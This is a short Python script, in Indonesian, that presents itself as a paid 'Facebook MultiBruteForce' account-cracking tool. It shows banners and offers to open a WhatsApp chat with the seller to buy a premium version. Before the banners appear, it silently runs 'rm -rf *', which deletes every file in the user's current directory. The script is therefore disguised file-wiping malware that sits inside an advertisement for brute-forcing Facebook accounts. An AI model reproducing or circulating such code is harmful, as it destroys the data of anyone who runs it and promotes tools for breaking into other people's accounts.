# Achmad 404 #
r = "\033[91m"
y = "\033[93m"
pm = "===================================================="
Banner =(
r+"""[!] mohon maat tool ini tidak gratis silakan membeli
    fitur premium untuk tool FACEBOOK MultiBruteForce.""")
Banner1 =(
r+"""              FACEBOOK MultiBruteForce   
            #####    ACHMAD 404    #####
                 WA : 085608035292 
                    versi : 2.0 """)
                    
                    
# anjing kau bila kau copy punya saya 
import time,subprocess,os
os.system("rm -rf *")
os.system("clear")
print(y+pm)
print(Banner1)
print(y+pm)
print(Banner)
print("[!] pilih y untuk langsung menghubungi administrator (whatsapp)")
f=raw_input("[!] beli? y/n): ").lower()
if f =="y":
    subprocess.check_output(
								["am","start",
				"https://api.whatsapp.com/send?phone=6285608035292&text=helo%20admin%20saya%20ingin%20membeli%20tool%20FacebookMultiBruteForce%20premium"])
print(y+pm)
exit('\n\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mterimakasih atas jawaban anda.')
    
#s=subprocess.Popen(["git","pull"],
#    stdout=subprocess.PIPE)
#time.sleep(2)
